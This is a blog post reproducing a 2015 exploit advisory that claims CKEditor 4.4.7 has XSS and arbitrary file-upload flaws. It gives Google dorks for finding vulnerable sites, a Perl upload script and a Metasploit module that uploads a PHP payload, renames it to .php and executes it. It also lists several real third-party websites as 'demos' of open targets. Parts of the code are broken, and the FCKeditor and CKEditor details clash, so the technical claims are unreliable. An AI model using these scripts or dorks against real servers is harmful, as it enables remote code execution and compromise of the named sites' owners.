Friday, March 20, 2015

Ckeditor v4.4.7.xx Multiple Vulnerabilities

#################################
#-----------------------------------------
#[Copyright (c) 2015 | Dz Offenders Cr3w]
#-----------------------------------------
################################

# >>    D_x . Made In Algeria . x_Z    << #
################################

#
# [>] Title : Ckeditor v4.4.7.xx Multiple Vulnerabilities
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Upload , XSRF-HTML Injection
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [>] ^_^ Greetings to 1337day Users/FAN's <3
# [-] F-ck Hacking , LuV Exploiting
# [!] Vendor : http://ckeditor.com/
# [D] Download :
#     - http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.4.7/ckeditor_4.4.7_full.zip
#
#######################################################################
#
# [!] Description :
#
# FCKeditor version 4.4.7 is suffer from XSS/HTML Injection and
# Other multiple vulnerabilities like File Upload (more ex: see->
# [ http://1337day.com/search?search_request=ckeditor ]
# remote attacker can use some CKE files to upload remote file or
# Injecting XSS/HTML Codes.
#
#
#####
#
# [!] Google Dorks :
# ------------------
# 1- allinurl:"/ckeditor/samples/plugins/htmlwriter"
# 2- allinurl:"/ckeditor/samples/plugins/htmlwriter/outputhtml.html"
# 3- allinurl:"/FCKeditor/_samples/php/sample01.php"
# 4- allinurl:"/FCKeditor/editor/filemanager/browser/default/browser.html"
# 5- allinurl:"/FCKeditor/editor/filemanager"
#
#####
#
# [+] Exploit (1) ' XSS/XSRF/HTML Injection ' :=>
# -----------------------------------------------
#
# - the vuln in htmlwriter plugin :
#
# > http://[target]/[path]/ckeditor/samples/plugins/htmlwriter/outputhtml.html
#
# > Edit & Submit you'r Code just it !
#
#####
#
# [+] Exploit (2) ' File Upload ' :=>
# -----------------------------------
# REF : http://1337day.com/search?search_request=ckeditor
#
# +> Use this PERL Script :=>
# ***********
# #!/usr/bin/perl
#
# use strict;
# use LWP::UserAgent;
# use HTTP::Request::Common;

# print <<INTRO;
# - CKEditor 4.4.x Arbitrary File Upload Exploit
# - Coded By KedAns-Dz
# - Contact: ked-h@hotmail.com
# - Greetings: 1337day , Dz Offenders , All my Homies
# - Copyright (C) 03-2015 - Dz Offenders Cr3w
# INTRO
# print "Target host and Path: ";
# chomp (my $tar=<STDIN>);
# print "Directory / File / Shell: ";
# chomp (my $shell=<STDIN>);
#
# my $a = LWP::UserAgent->new;
# my $b = $a->request(POST $tar.'/fckeditor/editor/filemanager/browser/upload/php/upload.php';
# Content_Type => 'form-data',
# Content => [ NewFile => $shell ] );
#
# if ($b->is_success) {
# if (index($b->content, "Disabled") != -1) { print "The webserver is manipulated with your shellcode.\n"; }
# else { print "Exploit failed! :(\n";
# } else { print "Not connected with Target!\n"; }
#
##########
# *********
# Or wit' that MSF Exploit :=>
#
#
# require 'msf/core'

# class Metasploit3 < Msf::Exploit::Remote
#      Rank = ExcellentRanking
#
#      include Msf::Exploit::Remote::HttpClient
#
#      def initialize(info = {})
#          super(update_info(info,
#           'Name' => 'FCKeditor 4.4.x File Upload Code Execution',
#           'Description' => %q{
#              This module exploits a vulnerability in the FCK/CKeditor plugin.
#               By renaming the uploaded file this vulnerability can be used to upload/execute
#               code on the affected system.
#               },
#               'Author' => [ 'KedAns-Dz <ked-h[at]1337day.com>' ],
#               'License' => MSF_LICENSE,
#               'Version'    => '1.0',
#               'References' =>
#               [
#                 ['URL', 'http://1337day.com/search?search_request=ckeditor'],
#               ],
#               'Privileged' => false,
#               'Payload'    =>
#                        {
#                          'DisableNops' => true,
#                          'Compat'      =>
#                             {
#                              'ConnectionType' => 'find',
#                             },
#                          'Space'       => 1024,
#                                },
#                        'Platform'       => 'php',
#                        'Arch'           => ARCH_PHP,
#                        'Targets'        => [[ 'Automatic', { }]],
#                        'DisclosureDate' => '02/05/2011',
#                        'DefaultTarget'  => 0))
#
#                        register_options(
#                                [
#                                 OptString.new('URI', [true, "CKE Target directory path", "/"]),
#                                ], self.class)
#        end
#
#        def check
#            uri = ''
#            uri << datastore['URI']
#            uri << '/' if uri[-1,1] != '/'
#            uri << 'fckeditor/editor/filemanager/connectors/php/upload.php?Type=File'
#            res = send_request_raw(
#                {
#                 'uri' => uri
#                }, 25)
#
#                if (res and res.body =~ /sample16.swf/)
#                   return Exploit::CheckCode::Vulnerable
#                end
#
#           return Exploit::CheckCode::Safe
#        end
#
#
#        def retrieve_obfuscation()
#
#        end
#
#
#        def exploit
#
#           cmd_php = '<?php ' + payload.encoded + '?>'
#
#           # Generate some random strings
#           cmdscript       = rand_text_alpha_lower(20)
#           boundary    = rand_text_alphanumeric(6)
#
#           # Static files
#           directory       = '/fckeditor/editor/images'
#           uri_base    = ''
#           uri_base << datastore['URI']
#           uri_base << '/' if uri_base[-1,1] != '/'
#           uri_base << 'fckeditor/editor/filemanager/connectors/php'
#
#           # Get obfuscation code (needed to upload files)
#           obfuscation_code = nil
#
#           res = send_request_raw({
#           'uri'     => uri_base + '/upload.php?Type=File'
#           }, 25)
#
#           if (res)
#
#           if(res.body =~ /"obfus", "((\w)+)"\)/)
#             obfuscation_code = $1
#             print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
#             else
#             print_error("Error retrieving obfuscation code!")
#             return
#            end
# end
#
#            # Upload shellcode (file ending .ph.p)
#            data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"
#            data << "#{cmdscript}.ph.p\r\n--#{boundary}"
#            data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"
#            data << "Content-Type: application/octet-stream\r\n\r\n"
#            data << cmd_php
#            data << "\r\n--#{boundary}--"
#
#            res = send_request_raw({
#            'uri'     => uri_base + "/connector.php?Command=FileUpload&Type=File&CurrentFolder=" + directory + "&obfuscate=#{obfuscation_code}",
#            'method'  => 'POST',
#            'data'    => data,
#            'headers' =>
#                {
#                  'Content-Length' => data.length,
#                  'Content-Type'   => 'multipart/form-data; boundary=' + boundary,
#                }
#             }, 25)
#
#            if (res and res.body =~ /File Upload Success/)
#               print_status("Successfully uploaded #{cmdscript}.ph.p")
#            else
#               print_error("Error uploading #{cmdscript}.ph.p")
# end
#
#                # Complete the upload process (rename file)
#                print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")
#                res = send_request_raw({
#                'uri' => uri_base + '/connector.php?Command=FileUpload&Type=File&CurrentFolder=' + directory + '&filetotal=1'
#                })
#
#                # Rename the file from .ph.p to .php
#                res = send_request_cgi(
#                  {
#                   'method'    => 'POST',
#                   'uri'       => uri_base + '/connector.php?Command=Edit&Type=File&CurrentFolder=',
#                   'vars_post' =>
#                   {
#                     'actionfile[0]' => "#{cmdscript}.ph.p",
#                     'renameext[0]'   => 'p',
#                     'renamefile[0]' => "#{cmdscript}.ph",
#                     'sortby' => 'name',
#                     'sorttype' => 'asc',
#                     'showpage' => '0',
#                     'action' => 'rename',
#                     'commit' => '',
#                    }
#                   }, 10)
#
#                if (res and res.body =~ /successfully renamed./)
#                        print_status ("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")
#                else
#                        print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")
#                end
#
#
#                # Finally call the payload
#                print_status("Calling payload: #{cmdscript}.php")
#                uri = ''
#                uri << datastore['URI']
#                uri << '/' if uri[-1,1] != '/'
#                uri << directory + cmdscript + ".php"
#                res = send_request_raw({
#                        'uri'   => uri
#               }, 25)
#
#        end
#
# end
#
#
#
###########
#
# Demo's :=>
# http://common.beyondindigopets.com/ckeditor/samples/plugins/htmlwriter/outputhtml.html
# http://heather.cs.ucdavis.edu/ckeditor/samples/plugins/htmlwriter/outputhtml.html
# http://dol-de-bretagne.fr/scripts/FCKeditor/_samples/php/sample01.php
# http://tutor.talkbean.com/front/com/FCKeditor/editor/filemanager/browser/default/browser.html
# http://www.aseat.fr/fckeditor/editor/filemanager/browser/default/browser.html
# Mo in g00glE ;)
#######################################################################
#
# REF :
# > http://packetstormsecurity.com/files/130807/Ckeditor-4.4.7-Shell-Upload-Cross-Site-Scripting.html
# > https://cxsecurity.com/issue/WLB-2015030092
# > OSVDB : http://osvdb.org/show/osvdb/119607
#
####
#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=
####

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.